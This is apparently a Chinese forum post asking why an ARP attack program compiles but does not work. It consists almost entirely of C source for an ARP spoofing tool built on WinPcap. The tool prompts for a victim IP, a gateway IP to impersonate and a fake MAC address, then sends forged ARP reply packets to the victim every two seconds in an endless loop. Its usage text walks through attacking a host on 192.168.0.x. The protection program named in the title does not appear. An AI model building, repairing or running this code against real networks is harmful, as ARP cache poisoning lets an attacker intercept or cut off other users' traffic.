求助!我的arp攻击程序和防护程序可以编译但是不能实现功能
#include <winsock2.h>#include <stdio.h>
#include <Iphlpapi.h>
#include "packet32.h"
#pragma comment(lib, "packet.lib")
#pragma comment(lib, "WS2_32.lib")
#pragma comment(lib, "Iphlpapi.lib")
typedef struct tagAdapterInfo //网卡信息结构
{
char szDeviceName[128]; // 名字
char szIPAddrStr[16]; // IP
char szHWAddrStr[18]; // MAC
DWORD dwIndex; // 编号
bool filled;//是否取得了网卡信息
}INFO_ADAPTER, *PINFO_ADAPTER;
INFO_ADAPTER infoAdapterList[10];
typedef struct _et_header //以太网头部
{
unsigned char eh_dst[6]; //接收方的MAC
unsigned char eh_src[6]; //发送方的MAC
unsigned short eh_type; //arp报文类型 0x0806
}ET_HEADER;
#pragma pack(1)
typedef struct _arp_header //ARP头部
{
unsigned short arp_hdr; //硬件地址类型 以太网 0x0001
unsigned short arp_pro; //上层协议地址类型 IP协议 0x0800
unsigned char arp_hln; //MAC地址长度 0x06
unsigned char arp_pln; //IP地质长度 0x04
unsigned short arp_opt; //操作码 0x0001 请求 0x0002 应答
unsigned char arp_sha[6]; //发送方 MAC
unsigned long arp_spa; //发送方 IP
unsigned char arp_tha[6]; //接收方 MAC
unsigned long arp_tpa; //接收方 IP
}ARP_HEADER;
#pragma pack()
int GetLocalAdapterList() //获取本机所有网卡
{
char tempChar;
ULONG uListSize=1;
PIP_ADAPTER_INFO pAdapter; // 定义PIP_ADAPTER_INFO结构存储网卡信息
int nAdapterIndex = 0;
//获得网卡列表信息串长度
DWORD dwRet = GetAdaptersInfo((PIP_ADAPTER_INFO)&tempChar, &uListSize);
printf("\r\nTry to get adapter list...\r\n");
if (dwRet == ERROR_BUFFER_OVERFLOW)
{
PIP_ADAPTER_INFO pAdapterListBuffer = (PIP_ADAPTER_INFO) new (char[uListSize]);
dwRet = GetAdaptersInfo(pAdapterListBuffer, &uListSize);
if (dwRet == ERROR_SUCCESS)
{
pAdapter = pAdapterListBuffer;
// 枚举网卡然后将相关条目添加到List中
while (pAdapter)
{
// 网卡名字
char strTemp[128];
lstrcpy(strTemp, "\\Device\\NPF_");
lstrcat(strTemp,pAdapter->AdapterName); // 加上前缀
lstrcpy(infoAdapterList[nAdapterIndex].szDeviceName,strTemp);
// IP
lstrcpy(infoAdapterList[nAdapterIndex].szIPAddrStr,pAdapter->IpAddressList.IpAddress.String);
// MAC
sprintf(infoAdapterList[nAdapterIndex].szHWAddrStr, "%02x%02x%02x%02x%02x%02x",
pAdapter->Address[0],pAdapter->Address[1],pAdapter->Address[2],
pAdapter->Address[3],pAdapter->Address[4],pAdapter->Address[5]);
// 网卡编号
infoAdapterList[nAdapterIndex].dwIndex = pAdapter->Index;
pAdapter = pAdapter->Next;
nAdapterIndex ++;
}
delete pAdapterListBuffer;
}
return nAdapterIndex;
}
return 0;
}
void StrToMac(char *str,unsigned char *mac) //将字符串转为16进制的Mac地址
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
switch(*str)
{
case 'a' : high=10;break;
case 'b': high=11;break;
case 'c': high=12;break;
case 'd': high=13;break;
case 'e': high=14;break;
case 'f': high=15;break;
default: temp=*str;
high=atoi(&temp);
}
switch(*str1)
{
case 'a' : low=10;break;
case 'b': low=11;break;
case 'c': low=12;break;
case 'd': low=13;break;
case 'e': low=14;break;
case 'f': low=15;break;
default:temp=*str1;
low=atoi(&temp);
}
mac[i]=high*16+low;
str+=2;
}
}
int about()
{
printf("使用方法 : ArpAttack 被攻击方IP 发送方IP 假的MAC地址\r\n");
printf("\n假设想攻击192.168.0.2 那么先取得网关IP地址 :192.168.0.1");
printf("\n然后再 arpattack 192.168.0.2 192.168.0.1 222222222222(虚假MAC地址)");
return 1;
}
int GetRemoteMac(unsigned char*remoteMac,char *remoteIP)//获取某IP真实mac地址 并输出
{
// remoteIP="10.200.203.179";
WSADATA wsdata;
ULONG remoteAddr=0,macAddrlen=6;
unsigned char remoteMacTemp[6]={0};
if(WSAStartup(MAKEWORD(2,1),&wsdata)!=0)
{
printf("WSAStartup Error!\r\n");
return 0;
}
remoteAddr=inet_addr(remoteIP);
if(SendARP(remoteAddr,(unsigned long)NULL,(PULONG)&remoteMacTemp,&macAddrlen)!=NO_ERROR)
{
printf("Get Remote MAC failed!\r\n");
return 0;
}
memcpy(remoteMac,remoteMacTemp,6);
printf("Remote IP:%s MAC:",remoteIP);
for (int i=0;i<6;i++)
{
printf("%.2x-",remoteMacTemp[i]);
}
printf("\r\n");
return 1;
}
int main(int argc,char *argv[])
{
// argv[0]="arpattack";
// argv[1]="192.168.1.3"; //攻击目标IP
// argv[2]="192.168.1.1"; //用于欺骗的IP地址,一般使用网关地址
// argv[3]="222222222222"; //伪装Mac地址
// argc=4;
unsigned char fakemac[6]={0};
int index;
char tarIP[16];
char srcIP[16];
char cheatMac[13];
printf("请输入攻击目标IP:");
scanf("%s",tarIP);
printf("请输入用于欺骗的IP地址(一般使用网关地址):");
scanf("%s",srcIP);
printf("请输入伪装Mac地址:");
scanf("%s",cheatMac);
LPADAPTER lpAdapter;
// if (argc<4)
// {
// about();
// return 0;
// }
unsigned char remoteMac[6]={0};
if(!GetRemoteMac(remoteMac,tarIP)) //根据IP获得对应的Mac地址
{
printf("GetRemoteMac Error!\r\n");
return -1;
}
// printf("%d\r\n",sizeof(ARP_HEADER));
// printf("%d\r\n",sizeof(ET_HEADER));
int adaptercout = GetLocalAdapterList();
StrToMac(cheatMac,fakemac);
for(int ab=0;ab<adaptercout;ab++) //列举本机所有可用网卡
printf("%d: %s: %s\n\n",ab+1,infoAdapterList[ab].szIPAddrStr,infoAdapterList[ab].szDeviceName);
printf("请选择一块网卡:");
while(TRUE)
{
scanf("%d",&index);
if(index >0 && index <=adaptercout)
break;
else
printf("请重新输入:");
}
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)infoAdapterList[index-1].szDeviceName); //选择一块网卡发送包
if(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("acketOepnAdapter Error!\r\n");
return -1;
}
//---------------------------------------------------------------------------
//构造一个arp包
ET_HEADER et_header;
ARP_HEADER arp_header;
memcpy(et_header.eh_dst,remoteMac,6); //被欺骗的目标Mac地址
memcpy(et_header.eh_src,fakemac,6); //用于欺骗的Mac地址
et_header.eh_type=htons(0x0806); //类型为0x0806表示这是ARP包
arp_header.arp_hdr=htons(0x0001); //硬件地址类型以太网地址
arp_header.arp_pro=htons(0x0800); //协议地址类型为IP协议
arp_header.arp_hln=0x06; //硬件地址长度为6
arp_header.arp_pln=0x04; //协议地址长度为4
arp_header.arp_opt=htons(0x0002); //标识为ARP应答
arp_header.arp_spa=inet_addr(srcIP); //用于欺骗的ip
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(tarIP); //被欺骗的目标IP
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
char buffer[512]={0};
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
//------------------------------------------------------------------------
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //分配内存
PacketInitPacket(lpPacket,buffer,64);//初始化
if(PacketSetNumWrites(lpAdapter,2)==FALSE) //设置发送次数
{
printf("攻击失败! \r\n");
return 0;
}
while(TRUE)
{
// struct in_addr sAddr,tdAddr;
// sAddr.S_un.S_addr=arp_header.arp_spa;
// tdAddr.S_un.S_addr=arp_header.arp_tpa;
printf("攻击 %s中\r\n",tarIP);
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE) //发送包
{
printf("攻击失败!\r\n");
break;
}
Sleep(2000); //每发一个包后休息2s再发
}
PacketFreePacket(lpPacket);//释放
PacketCloseAdapter(lpAdapter); //关闭网卡
return 1;
}
